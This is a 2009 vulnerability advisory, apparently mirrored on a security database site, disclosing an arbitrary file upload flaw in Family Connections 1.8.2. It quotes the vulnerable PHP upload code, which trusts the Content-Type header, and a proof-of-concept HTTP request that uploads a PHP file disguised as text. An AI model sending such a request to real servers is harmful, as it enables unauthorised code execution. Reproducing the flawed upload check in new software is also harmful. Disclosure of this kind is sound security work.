Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:21573
HistoryApr 03, 2009 - 12:00 a.m.

Family Connections 1.8.2 Arbitrary File Upload

2009-04-0300:00:00
vulners.com
23
JSON

******* Salvatore "drosophila" Fresta *******

[+] Application: Family Connection
[+] Version: <= 1.8.2
[+] Website: http://www.familycms.com

[+] Bugs: [A] Arbitrary File Upload

[+] Exploitation: Remote
[+] Date: 3 Apr 2009

[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: [email protected]

[+] Menu

1) Bugs
2) Code
3) Fix

[+] Bugs

  • [A] Arbitrary File Upload

[-] Files affected: documents.php inc/documents_class.php

This bug allows a registered user to upload arbitrary
files on the system. This is possible because there
aren't controls on file extension but on the
Content-Type header only, that can be changed easily.

if (isset($_POST['submitadd'])) {
$doc = $_FILES['doc']['name'];
$desc = addslashes($_POST['desc']);
if ($docs->uploadDocument($_FILES['doc']['type'],
$_FILES['doc']['name'], $_FILES['doc']['tmp_name'])) {

function uploadDocument ($filetype, $filename, $filetmpname) {
global $LANG;
$known_photo_types = array('application/msword' => 'doc',
'text/plain' => 'txt', 'application/excel' => 'xsl',
'application/vnd.ms-excel' => 'xsl', 'application/x-msexcel' => 'xsl',
'application/x-compressed' => 'zip', 'application/x-zip-compressed'
=> 'zip', 'application/zip' => 'zip', 'multipart/x-zip' => 'zip',
'application/rtf' => 'rtf',
'application/x-rtf' => 'rtf', 'text/richtext' => 'rtf',
'application/mspowerpoint' => 'ppt', 'application/powerpoint' =>
'ppt', 'application/vnd.ms-powerpoint' => 'ppt',
'application/x-mspowerpoint' => 'ppt', 'application/x-excel' =>
'xsl', 'application/pdf' => 'pdf');
if (!array_key_exists($filetype, $known_photo_types)) {
echo "<p class=\"error-alert\">".$LANG['err_not_doc1']." $filetype
".$LANG['err_not_doc2']."<br/>".$LANG['err_not_doc3']."</p>";
return false;
} else {
copy($filetmpname, "gallery/documents/$filename");
return true;
}
}

[+] Code

  • [A] Arbitrary File Upload

The following is an example of a malicious package:

POST /fcms/upload.php HTTP/1.1\r\n
Host: localhost\r\n
Cookie: PHPSESSID=50fb1135c2da7f60bb66eb35cbc6ab97\r\n
Content-type: multipart/form-data, boundary=AaB03x\r\n
Content-Length: 295\r\n\r\n
–AaB03x\r\n
Content-Disposition: form-data; name="doc"; filename="file.php"\r\n
Content-Type: text/plain\r\n
\r\n
<?php echo "This is not a text file"?>\r\n
–AaB03x\r\n
Content-Disposition: form-data; name="desc"\r\n
\r\n
description\r\n
–AaB03x\r\n
Content-Disposition: form-data; name="submitadd"\r\n
\r\n
Submit\r\n
–AaB03x–\r\n

[+] Fix

No fix.


Salvatore "drosophila" Fresta
CWNP444351

JSON